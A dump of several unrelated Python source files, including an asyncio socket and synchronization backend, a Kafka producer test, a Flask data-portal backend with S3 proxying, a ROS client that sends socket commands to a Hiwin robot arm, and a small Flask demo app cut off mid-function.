def eof_received(self) -> Optional[bool]:
self.read_event.set()
return None
def pause_writing(self) -> None:
self.write_event.clear()
def resume_writing(self) -> None:
self.write_event.set()
class DatagramProtocol(asyncio.DatagramProtocol):
read_queue: Deque[Tuple[bytes, IPSockAddrType]]
read_event: asyncio.Event
write_event: asyncio.Event
exception: Optional[Exception] = None
def connection_made(self, transport: asyncio.BaseTransport) -> None:
self.read_queue = deque(maxlen=100) # arbitrary value
self.read_event = asyncio.Event()
self.write_event = asyncio.Event()
self.write_event.set()
def connection_lost(self, exc: Optional[Exception]) -> None:
self.read_event.set()
self.write_event.set()
def datagram_received(self, data: bytes, addr: IPSockAddrType) -> None:
addr = convert_ipv6_sockaddr(addr)
self.read_queue.append((data, addr))
self.read_event.set()
def error_received(self, exc: Exception) -> None:
self.exception = exc
def pause_writing(self) -> None:
self.write_event.clear()
def resume_writing(self) -> None:
self.write_event.set()
class SocketStream(abc.SocketStream):
def __init__(self, transport: asyncio.Transport, protocol: StreamProtocol):
self._transport = transport
self._protocol = protocol
self._receive_guard = ResourceGuard('reading from')
self._send_guard = ResourceGuard('writing to')
self._closed = False
async def receive(self, max_bytes: int = 65536) -> bytes:
with self._receive_guard:
await checkpoint()
if not self._protocol.read_queue and not self._transport.is_closing():
self._protocol.read_event.clear()
self._transport.resume_reading()
await self._protocol.read_event.wait()
self._transport.pause_reading()
try:
chunk = self._protocol.read_queue.popleft()
except IndexError:
if self._closed:
raise ClosedResourceError from None
elif self._protocol.exception:
raise BrokenResourceError from self._protocol.exception
else:
raise EndOfStream
if len(chunk) > max_bytes:
# Split the oversized chunk
chunk, leftover = chunk[:max_bytes], chunk[max_bytes:]
self._protocol.read_queue.appendleft(leftover)
return chunk
async def send(self, item: bytes) -> None:
with self._send_guard:
await checkpoint()
try:
self._transport.write(item)
except RuntimeError as exc:
if self._closed:
raise ClosedResourceError from None
elif self._transport.is_closing():
raise BrokenResourceError from exc
else:
raise
await self._protocol.write_event.wait()
async def send_eof(self) -> None:
try:
self._transport.write_eof()
except OSError:
pass
async def aclose(self) -> None:
if not self._transport.is_closing():
self._closed = True
try:
self._transport.write_eof()
except OSError:
pass
self._transport.close()
await asyncio.sleep(0)
self._transport.abort()
@property
def raw_socket(self) -> socket.socket:
return self._transport.get_extra_info('socket')
class SocketListener(abc.SocketListener):
def __init__(self, raw_socket: socket.SocketType):
self._raw_socket = raw_socket
self._loop = cast(asyncio.BaseEventLoop, get_running_loop())
self._accept_guard = ResourceGuard('accepting connections from')
@property
def raw_socket(self) -> socket.socket:
return self._raw_socket
async def accept(self) -> abc.SocketStream:
with self._accept_guard:
await checkpoint()
try:
client_sock, _addr = await self._loop.sock_accept(self._raw_socket)
except asyncio.CancelledError:
# Workaround for https://bugs.python.org/issue41317
try:
self._loop.remove_reader(self._raw_socket)
except NotImplementedError:
pass
raise
if client_sock.family in (socket.AF_INET, socket.AF_INET6):
client_sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
transport, protocol = await self._loop.connect_accepted_socket(StreamProtocol, client_sock)
return SocketStream(cast(asyncio.Transport, transport), cast(StreamProtocol, protocol))
async def aclose(self) -> None:
self._raw_socket.close()
class UDPSocket(abc.UDPSocket):
def __init__(self, transport: asyncio.DatagramTransport, protocol: DatagramProtocol):
self._transport = transport
self._protocol = protocol
self._receive_guard = ResourceGuard('reading from')
self._send_guard = ResourceGuard('writing to')
self._closed = False
async def aclose(self) -> None:
if not self._transport.is_closing():
self._closed = True
self._transport.close()
@property
def raw_socket(self) -> socket.socket:
return self._transport.get_extra_info('socket')
async def receive(self) -> Tuple[bytes, IPSockAddrType]:
with self._receive_guard:
await checkpoint()
# If the buffer is empty, ask for more data
if not self._protocol.read_queue and not self._transport.is_closing():
self._protocol.read_event.clear()
await self._protocol.read_event.wait()
try:
return self._protocol.read_queue.popleft()
except IndexError:
if self._closed:
raise ClosedResourceError from None
else:
raise BrokenResourceError from None
async def send(self, item: UDPPacketType) -> None:
with self._send_guard:
await checkpoint()
await self._protocol.write_event.wait()
if self._closed:
raise ClosedResourceError
elif self._transport.is_closing():
raise BrokenResourceError
else:
self._transport.sendto(*item)
class ConnectedUDPSocket(abc.ConnectedUDPSocket):
def __init__(self, transport: asyncio.DatagramTransport, protocol: DatagramProtocol):
self._transport = transport
self._protocol = protocol
self._receive_guard = ResourceGuard('reading from')
self._send_guard = ResourceGuard('writing to')
self._closed = False
async def aclose(self) -> None:
if not self._transport.is_closing():
self._closed = True
self._transport.close()
@property
def raw_socket(self) -> SocketType:
return self._transport.get_extra_info('socket')
async def receive(self) -> bytes:
with self._receive_guard:
await checkpoint()
# If the buffer is empty, ask for more data
if not self._protocol.read_queue and not self._transport.is_closing():
self._protocol.read_event.clear()
await self._protocol.read_event.wait()
try:
packet = self._protocol.read_queue.popleft()
except IndexError:
if self._closed:
raise ClosedResourceError from None
else:
raise BrokenResourceError from None
return packet[0]
async def send(self, item: bytes) -> None:
with self._send_guard:
await checkpoint()
await self._protocol.write_event.wait()
if self._closed:
raise ClosedResourceError
elif self._transport.is_closing():
raise BrokenResourceError
else:
self._transport.sendto(item)
async def connect_tcp(host: str, port: int,
local_addr: Optional[Tuple[str, int]] = None) -> SocketStream:
transport, protocol = cast(
Tuple[asyncio.Transport, StreamProtocol],
await get_running_loop().create_connection(StreamProtocol, host, port,
local_addr=local_addr)
)
transport.pause_reading()
return SocketStream(transport, protocol)
async def connect_unix(path: str) -> SocketStream:
transport, protocol = cast(
Tuple[asyncio.Transport, StreamProtocol],
await get_running_loop().create_unix_connection(StreamProtocol, path)
)
transport.pause_reading()
return SocketStream(transport, protocol)
async def create_udp_socket(
family: socket.AddressFamily,
local_address: Optional[IPSockAddrType],
remote_address: Optional[IPSockAddrType],
reuse_port: bool
) -> Union[UDPSocket, ConnectedUDPSocket]:
result = await get_running_loop().create_datagram_endpoint(
DatagramProtocol, local_addr=local_address, remote_addr=remote_address, family=family,
reuse_port=reuse_port)
transport = cast(asyncio.DatagramTransport, result[0])
protocol = cast(DatagramProtocol, result[1])
if protocol.exception:
transport.close()
raise protocol.exception
if not remote_address:
return UDPSocket(transport, protocol)
else:
return ConnectedUDPSocket(transport, protocol)
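# Illustrative sketch (not part of the backend itself): a TCP round trip over
# the SocketStream returned by connect_tcp(). The host and port are placeholders.
async def _example_tcp_roundtrip():
    stream = await connect_tcp('127.0.0.1', 8080)
    await stream.send(b'ping')
    reply = await stream.receive()
    await stream.aclose()
    return reply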
async def getaddrinfo(host: Union[bytearray, bytes, str], port: Union[str, int, None], *,
family: Union[int, AddressFamily] = 0, type: Union[int, SocketKind] = 0,
proto: int = 0, flags: int = 0) -> GetAddrInfoReturnType:
# https://github.com/python/typeshed/pull/4304
result = await get_running_loop().getaddrinfo(
host, port, family=family, type=type, proto=proto, flags=flags) # type: ignore[arg-type]
return cast(GetAddrInfoReturnType, result)
async def getnameinfo(sockaddr: IPSockAddrType, flags: int = 0) -> Tuple[str, str]:
# https://github.com/python/typeshed/pull/4305
result = await get_running_loop().getnameinfo(sockaddr, flags)
return cast(Tuple[str, str], result)
async def wait_socket_readable(sock: socket.SocketType) -> None:
await checkpoint()
if _read_events.get(sock):
raise BusyResourceError('reading from') from None
loop = get_running_loop()
event = _read_events[sock] = asyncio.Event()
get_running_loop().add_reader(sock, event.set)
try:
await event.wait()
finally:
if _read_events.pop(sock, None) is not None:
loop.remove_reader(sock)
readable = True
else:
readable = False
if not readable:
raise ClosedResourceError
async def wait_socket_writable(sock: socket.SocketType) -> None:
await checkpoint()
if _write_events.get(sock):
raise BusyResourceError('writing to') from None
loop = get_running_loop()
event = _write_events[sock] = asyncio.Event()
loop.add_writer(sock.fileno(), event.set)
try:
await event.wait()
finally:
if _write_events.pop(sock, None) is not None:
loop.remove_writer(sock)
writable = True
else:
writable = False
if not writable:
raise ClosedResourceError
#
# Synchronization
#
class Lock(abc.Lock):
def __init__(self):
self._lock = asyncio.Lock()
def locked(self) -> bool:
return self._lock.locked()
async def acquire(self) -> None:
await checkpoint()
await self._lock.acquire()
async def release(self) -> None:
self._lock.release()
class Condition(abc.Condition):
def __init__(self, lock: Optional[Lock]):
asyncio_lock = lock._lock if lock else None
self._condition = asyncio.Condition(asyncio_lock)
async def acquire(self) -> None:
await checkpoint()
await self._condition.acquire()
async def release(self) -> None:
self._condition.release()
def locked(self) -> bool:
return self._condition.locked()
async def notify(self, n=1):
self._condition.notify(n)
async def notify_all(self):
self._condition.notify_all()
async def wait(self):
await checkpoint()
return await self._condition.wait()
class Event(abc.Event):
def __init__(self):
self._event = asyncio.Event()
async def set(self):
self._event.set()
def is_set(self) -> bool:
return self._event.is_set()
async def wait(self):
await checkpoint()
await self._event.wait()
class Semaphore(abc.Semaphore):
def __init__(self, value: int):
self._semaphore = asyncio.Semaphore(value)
async def acquire(self) -> None:
await checkpoint()
await self._semaphore.acquire()
async def release(self) -> None:
self._semaphore.release()
@property
def value(self):
return self._semaphore._value
class CapacityLimiter(abc.CapacityLimiter):
def __init__(self, total_tokens: float):
self._set_total_tokens(total_tokens)
self._borrowers: Set[Any] = set()
self._wait_queue: Dict[Any, asyncio.Event] = OrderedDict()
async def __aenter__(self):
await self.acquire()
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> None:
await self.release()
def _set_total_tokens(self, value: float) -> None:
if not isinstance(value, int) and not math.isinf(value):
raise TypeError('total_tokens must be an int or math.inf')
if value < 1:
raise ValueError('total_tokens must be >= 1')
self._total_tokens = value
@property
def total_tokens(self) -> float:
return self._total_tokens
async def set_total_tokens(self, value: float) -> None:
old_value = self._total_tokens
self._set_total_tokens(value)
events = []
for event in self._wait_queue.values():
if value <= old_value:
break
if not event.is_set():
events.append(event)
old_value += 1
for event in events:
event.set()
@property
def borrowed_tokens(self) -> int:
return len(self._borrowers)
@property
def available_tokens(self) -> float:
return self._total_tokens - len(self._borrowers)
async def acquire_nowait(self) -> None:
await self.acquire_on_behalf_of_nowait(current_task())
async def acquire_on_behalf_of_nowait(self, borrower) -> None:
if borrower in self._borrowers:
raise RuntimeError("this borrower is already holding one of this CapacityLimiter's "
"tokens")
if self._wait_queue or len(self._borrowers) >= self._total_tokens:
raise WouldBlock
self._borrowers.add(borrower)
async def acquire(self) -> None:
return await self.acquire_on_behalf_of(current_task())
async def acquire_on_behalf_of(self, borrower) -> None:
try:
await self.acquire_on_behalf_of_nowait(borrower)
except WouldBlock:
event = asyncio.Event()
self._wait_queue[borrower] = event
try:
await event.wait()
except BaseException:
self._wait_queue.pop(borrower, None)
raise
self._borrowers.add(borrower)
async def release(self) -> None:
await self.release_on_behalf_of(current_task())
async def release_on_behalf_of(self, borrower) -> None:
try:
self._borrowers.remove(borrower)
except KeyError:
raise RuntimeError("this borrower isn't holding any of this CapacityLimiter's "
"tokens") from None
# Notify the next task in line if this limiter has free capacity now
if self._wait_queue and len(self._borrowers) < self._total_tokens:
event = self._wait_queue.popitem()[1]
event.set()
def current_default_thread_limiter():
return _default_thread_limiter
_default_thread_limiter = CapacityLimiter(40)
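# Illustrative sketch (not part of the backend itself): bounding concurrency
# with a CapacityLimiter. The token count of 2 is an arbitrary example value.
async def _example_capacity_limiter():
    limiter = CapacityLimiter(2)
    # The limiter is also an async context manager: acquire on enter, release
    # on exit, with at most two borrowers holding a token at any time.
    async with limiter:
        await checkpoint()
    return limiter.available_tokens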
#
# Operating system signals
#
@asynccontextmanager
async def open_signal_receiver(*signals: int):
async def process_signal_queue():
while True:
signum = await queue.get()
yield signum
loop = get_running_loop()
queue = asyncio.Queue() # type: asyncio.Queue[int]
handled_signals = set()
agen = process_signal_queue()
try:
for sig in set(signals):
loop.add_signal_handler(sig, queue.put_nowait, sig)
handled_signals.add(sig)
yield agen
finally:
await agen.aclose()
for sig in handled_signals:
loop.remove_signal_handler(sig)
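# Illustrative sketch (not part of the backend itself): waiting for a single
# SIGTERM via open_signal_receiver(). This requires an event loop that supports
# add_signal_handler (i.e. not the default Windows loop).
async def _example_signal_wait():
    import signal
    async with open_signal_receiver(signal.SIGTERM) as signals:
        async for signum in signals:
            return signum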
#
# Testing and debugging
#
def _create_task_info(task: asyncio.Task) -> TaskInfo:
task_state = _task_states.get(task)
if task_state is None:
name = task.get_name() if _native_task_names else None # type: ignore
parent_id = None
else:
name = task_state.name
parent_id = task_state.parent_id
return TaskInfo(id(task), parent_id, name, task._coro) # type: ignore
async def get_current_task() -> TaskInfo:
return _create_task_info(current_task()) # type: ignore
async def get_running_tasks() -> List[TaskInfo]:
return [_create_task_info(task) for task in all_tasks() if not task.done()]
async def wait_all_tasks_blocked() -> None:
this_task = current_task()
while True:
for task in all_tasks():
if task is this_task:
continue
if isgenerator(task._coro): # type: ignore
awaitable = task._coro.gi_yieldfrom # type: ignore
else:
awaitable = task._coro.cr_await # type: ignore
# If the first awaitable is None, the task has not started running yet
task_running = bool(awaitable)
# Consider any task doing sleep(0) as not being blocked
while asyncio.iscoroutine(awaitable):
if isgenerator(awaitable):
code = awaitable.gi_code
f_locals = awaitable.gi_frame.f_locals
awaitable = awaitable.gi_yieldfrom
else:
code = awaitable.cr_code
f_locals = awaitable.cr_frame.f_locals
awaitable = awaitable.cr_await
if code is asyncio.sleep.__code__ and f_locals['delay'] == 0:
task_running = False
break
if not task_running:
await sleep(0.1)
break
else:
return
class TestRunner(abc.TestRunner):
def __init__(self, debug: bool = False, use_uvloop: bool = True,
policy: Optional[asyncio.AbstractEventLoopPolicy] = None):
_maybe_set_event_loop_policy(policy, use_uvloop)
self._loop = asyncio.new_event_loop()
self._loop.set_debug(debug)
asyncio.set_event_loop(self._loop)
def _cancel_all_tasks(self):
to_cancel = all_tasks(self._loop)
if not to_cancel:
return
for task in to_cancel:
task.cancel()
self._loop.run_until_complete(
asyncio.gather(*to_cancel, loop=self._loop, return_exceptions=True))
for task in to_cancel:
if task.cancelled():
continue
if task.exception() is not None:
raise task.exception()
def close(self) -> None:
try:
self._cancel_all_tasks()
self._loop.run_until_complete(self._loop.shutdown_asyncgens())
finally:
asyncio.set_event_loop(None)
self._loop.close()
def call(self, func: Callable[..., Awaitable], *args, **kwargs):
return self._loop.run_until_complete(func(*args, **kwargs))
|
test_producer.py
|
import os
import json
import pytest
import requests_mock
import time
import threading
from producer import Producer
from kafka import KafkaConsumer
default_config = [
{"url": "https://developers.italia.it", "regexp": "data"},
{"url": "https://oruga.io"},
{"url": "https://buefy.org", "regexp": "Vue"},
]
@pytest.fixture
def create_json_config():
config_file = "./config.json"
f = open("./config.json", "w")
f.write(json.dumps(default_config))
f.close()
yield None
os.remove(config_file)
def test_producer_creates_objects(create_json_config, kafka_admin_client):
kafka_admin_client.delete_topics(["reports"])
producer = Producer()
def launch_producer():
producer.connect()
with requests_mock.Mocker() as m:
m.get("https://developers.italia.it", text="data")
m.get("https://oruga.io", text="data")
m.get("https://buefy.org", text="data")
producer.start()
launcher = threading.Thread(target=launch_producer)
launcher.start()
time.sleep(10)
consumer = KafkaConsumer(
"reports",
bootstrap_servers=[f"{os.getenv('KAFKA_HOST', 'localhost:29092')}"],
api_version=(0, 10),
auto_offset_reset="earliest",
enable_auto_commit=False,
consumer_timeout_ms=5000,
)
producer.stop()
for msg in consumer:
site_stat = json.loads(msg.value)
key = msg.key.decode("utf-8")
if key == "https://developers.italia.it":
assert site_stat["content_check"] is True
if key == "https://oruga.io":
assert site_stat["content_check"] is True
if key == "https://buefy.org":
assert site_stat["content_check"] is False
assert site_stat["status_code"] == 200
assert site_stat["time"] > 0
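# Note: this test assumes a reachable Kafka broker (KAFKA_HOST, defaulting to
# localhost:29092) and a `kafka_admin_client` fixture provided elsewhere in the
# test suite (e.g. a conftest.py); neither is defined in this file.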
|
main.py
|
import json
import base64
import logging
from threading import Lock
from datetime import datetime, timedelta
import boto3
import requests
from botocore.exceptions import ClientError
from flask import Flask, abort, jsonify, request
from flask_cors import CORS
from flask_marshmallow import Marshmallow
from blackfynn import Blackfynn
from app.config import Config
from app.process_kb_results import process_kb_results_recursive
# from pymongo import MongoClient
import schedule
import threading
import time
from timeit import default_timer as timer
app = Flask(__name__)
# set environment variable
app.config["ENV"] = Config.DEPLOY_ENV
CORS(app)
# boto3 S3 client used by the "/download" and "/s3-resource/<path>" routes below;
# region and credentials are assumed to come from the environment.
s3 = boto3.client("s3")
times = []
def schedule_check():
while True:
schedule.run_pending()
time.sleep(1)
@app.route("/search/", defaults={'query': ''})
@app.route("/search/<query>")
def kb_search(query):
try:
response = requests.get(f'https://scicrunch.org/api/1/elastic/SPARC_Datasets_new/_search?q={query}&api_key={Config.KNOWLEDGEBASE_KEY}')
return process_kb_results_recursive(response.json())
except requests.exceptions.HTTPError as err:
logging.error(err)
return json.dumps({'error': str(err)})
def heart_query():
start = timer()
resp = kb_search('heart')
global times
try:
number_hits = json.loads(resp)['numberOfHits']
except Exception:
number_hits = 'Error in query'
times.append({'time run': time.strftime('%X %x %Z'), 'time elapsed': timer() - start, 'results': number_hits })
schedule.every().minute.do(heart_query)
heart_query()
x = threading.Thread(target=schedule_check, daemon=True)
x.start()
@app.errorhandler(404)
def resource_not_found(e):
return jsonify(error=str(e)), 404
@app.before_first_request
def connect_to_blackfynn():
global bf
bf = Blackfynn(
api_token=Config.BLACKFYNN_API_TOKEN,
api_secret=Config.BLACKFYNN_API_SECRET,
env_override=False,
)
# @app.before_first_request
# def connect_to_mongodb():
# global mongo
# mongo = MongoClient(Config.MONGODB_URI)
@app.route("/scicrunch-test")
def scitest():
global times
return jsonify({"Tests": times}), 200
@app.route("/health")
def health():
return json.dumps({"status": "healthy"})
# Download a file from S3
@app.route("/download")
def create_presigned_url(expiration=3600):
bucket_name = "blackfynn-discover-use1"
key = request.args.get("key")
response = s3.generate_presigned_url(
"get_object",
Params={"Bucket": bucket_name, "Key": key, "RequestPayer": "requester"},
ExpiresIn=expiration,
)
return response
# Reverse proxy for objects from S3, a simple get object
# operation. This is used by scaffoldvuer and it's
# important to keep the relative <path> for accessing
# other required files.
@app.route("/s3-resource/<path:path>")
def direct_download_url(path):
bucket_name = "blackfynn-discover-use1"
head_response = s3.head_object(
Bucket=bucket_name,
Key=path,
RequestPayer="requester",
)
content_length = head_response.get('ContentLength', None)
if content_length and content_length > 20971520: # 20 MB
return abort(413, description=f"File too big to download: {content_length}")
response = s3.get_object(
Bucket=bucket_name,
Key=path,
RequestPayer="requester",
)
resource = response["Body"].read()
return resource
@app.route("/filter-search/", defaults={'query': ''})
@app.route("/filter-search/<query>/")
def filter_search(query):
term = request.args.get('term')
facet = request.args.get('facet')
size = request.args.get('size')
start = request.args.get('start')
if size is None or start is None:
size = 20
start = 0
print('term', term)
print('facet', facet)
type_map = {
'species': ['organisms.subject.species.name', 'organisms.sample.species.name'],
'gender': ['attributes.subject.sex.value', 'attributes.sample.sex.value'],
'genotype': ['anatomy.organ.name.aggregate']
}
data = {
"size": size,
"from": start,
"query": {
"bool": {
"must": [],
"should": [],
"filter":
{
'term': {}
}
}
}
}
results = []
if term is not None and facet is not None:
data['query']['bool']['filter']['term'] = {f'{type_map[term][0]}': f'{facet}'}
else:
data['query']['bool']['filter'] = []
params = {}
if query != '':
if term is None:
params = {'q': query}
else:
data['query']['bool']['must'] = {
"query_string": {
"query": f"{query}",
"default_operator": "and",
"lenient": "true",
"type": "best_fields"
}
}
try:
print(data)
response = requests.get(
f'https://scicrunch.org/api/1/elastic/SPARC_Datasets_new/_search?api_key={Config.KNOWLEDGEBASE_KEY}',
params=params,
json=data)
results = process_kb_results_recursive(response.json())
except requests.exceptions.HTTPError as err:
logging.error(err)
return json.dumps({'error': str(err)})
return results
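# Illustrative example (hypothetical values): a request such as
#   GET /filter-search/heart/?term=species&facet=Rattus%20norvegicus
# builds an Elasticsearch body roughly like
#   {"size": 20, "from": 0,
#    "query": {"bool": {"must": {"query_string": {"query": "heart", ...}},
#                       "should": [],
#                       "filter": {"term": {"organisms.subject.species.name": "Rattus norvegicus"}}}}}
# before it is sent to the SciCrunch endpoint above.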
@app.route("/get-facets/<type>")
def get_facets(type):
type_map = {
'species': ['organisms.subject.species.name.aggregate', 'organisms.sample.species.name.aggregate'],
'gender': ['attributes.subject.sex.value'],
'genotype': ['anatomy.organ.name.aggregate']
}
data = {
"from": 0,
"size": 0,
"aggregations": {
f"{type}": {
"terms": {
"field": "",
"size": 200,
"order": [
{
"_count": "desc"
},
{
"_key": "asc"
}
]
}
}
}
}
results = []
for path in type_map[type]:
data['aggregations'][f'{type}']['terms']['field'] = path
response = requests.get(
f'https://scicrunch.org/api/1/elastic/SPARC_Datasets_new/_search?api_key={Config.KNOWLEDGEBASE_KEY}',
json=data)
results.append(response.json())
terms = []
for result in results:
terms += result['aggregations'][f'{type}']['buckets']
return json.dumps(terms)
@app.route("/banner/<dataset_id>")
def get_banner(dataset_id):
try:
params = {
'includePublishedDataset': True,
'api_key': bf._api.token
}
response = requests.get(f'https://api.blackfynn.io/datasets/{dataset_id}', params=params)
discover_id = response.json()['publication']['publishedDataset']['id']
response = requests.get(f'{Config.DISCOVER_API_HOST}/datasets/{discover_id}')
return response.json()
except requests.exceptions.HTTPError as err:
logging.error(err)
return json.dumps({'error': str(err)})
|
Hiwin_RT605_Socket_v3_20190628113341.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
## multithreading
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd_v3 as TCP
import HiwinRA605_socket_Taskcmd_v3 as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
#Socket = 0
#data = '0' # initial value of the transmitted data
Arm_feedback = 1 # assume the arm is busy
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
return  # PEP 479: raising StopIteration inside a generator is an error in Python 3.7+
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
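# Illustrative sketch of how the switch/case helper above is used in
# Socket_command() below; the values here are arbitrary, not real task codes.
def _switch_example(value):
    for case in switch(value):
        if case(1):
            return 'one'
        if case(2, 3):
            return 'two or three'
        if case():  # default branch
            return 'other'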
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
class client():
def __init__(self):
self.get_connect()
def get_connect(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(('192.168.0.1', 8080))
def send(self, msg):
self.s.send(msg.encode('utf-8')) # encode with utf-8; other encodings exist, but utf-8 is fine for str
def get_recieve(self):
data = self.s.recv(1024) # 1024 is the receive buffer size (max bytes per recv)
# The raw bytes are returned; Socket_feedback() below compares individual
# byte values (48 is ord('0'), 49 is ord('1'), 54 is ord('6')).
return data
def close(self):
self.s.close()
Socket = client()
def point_data(x,y,z,pitch,roll,yaw): ## receive pose data sent from the strategy (client) side
pos.x = '%s'%x
pos.y = '%s'%y
pos.z = '%s'%z
pos.pitch = '%s'%pitch
pos.roll = '%s'%roll
pos.yaw = '%s'%yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ## receive arm-mode data sent from the strategy side
global arm_mode_flag
socket_cmd.action = int('%s'%action)
socket_cmd.grip = int('%s'%grip)
socket_cmd.ra = int('%s'%ra)
socket_cmd.setvel = int('%s'%setvel)
socket_cmd.setboth = int('%s'%setboth)
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ## receive arm speed-mode data sent from the strategy side
socket_cmd.Speedmode = int('%s'%speedmode)
def socket_talker(): ## create the server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(200) # 200 Hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##---------- socket packet transmission ----------##
##--------------- send arm commands over the socket -----------------
def Socket_command():
global Socket
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#------- set arm speed --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#------- set arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#------- set arm fast & safe speed mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action = 6 ## switch back to the initial mode state
Socket.send(data)
##-----------socket client--------
def socket_client():
global Socket
try:
#Socket = client()
#Socket.get_connect()
#print("Socket_client :",dir(Socket))
#Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
Socket_feedback(Socket)
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback(s):
Socket = s
while 1:
feedback_str = Socket.get_recieve()
# the arm side reports the arm state
if str(feedback_str[2]) == '48':# F ('0'): arm is Ready and can accept the next motion command
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# T ('1'): arm is busy and cannot execute the next motion command
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# '6': strategy finished
state_feedback.ArmState = 6
print("shutdown")
# check the send flag
if str(feedback_str[4]) == '48':# returned 0 (false)
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':# returned 1 (true)
state_feedback.SentFlag = 1
##--------------- send arm commands over the socket: end -----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
##-----------socket client end--------
##------------- socket packet transmission: end --------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 6 ## switch to the initial mode state
## multithreading
t = threading.Thread(target=socket_client)
t.start() # start the socket client thread
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
## multithreading: end
|
app.py
|
from threading import Thread
from random import randint
import time
from flask import Flask, abort, request, render_template, json, jsonify
app = Flask(__name__)
app.static_folder = 'static'
@app.before_request
def limit_remote_addr():
if request.remote_addr != '127.0.0.1':
abort(403) # Forbidden
@app.route('/')
def hello():
return render_template('index.html')
@app.route('/test2')
def hello2():
return render_template('test2.html')
@app.route('/signup')
def signup():
return render_template('signup.html')
@app.route('/signupuser', methods=['POST', 'GET'])
def signupuser():
user = request.form['username']
password = request.form['password']
return json.dumps({'status': 'OK', 'user': user, 'pass': password})
@app.route('/_add_numbers')
def add_numbers():
a = request.args.get('a', 0, type=int)
b = request.args.get('b', 0, type=int)
return jsonify(result=a + b)
@app.route('/noisefloor')
def index():
return render_template('noisefloor.html')
@app.route('/sliderdata', methods=['POST'])
def sliderdata():
data = request.form['data']
#do something else here if necessary
return ('', 200)
@app.route('/numberdata', methods=['POST'])
def numberdata():
data1 = request.json.get('value1')
data2 = request.json.get('value2')
length = "--"
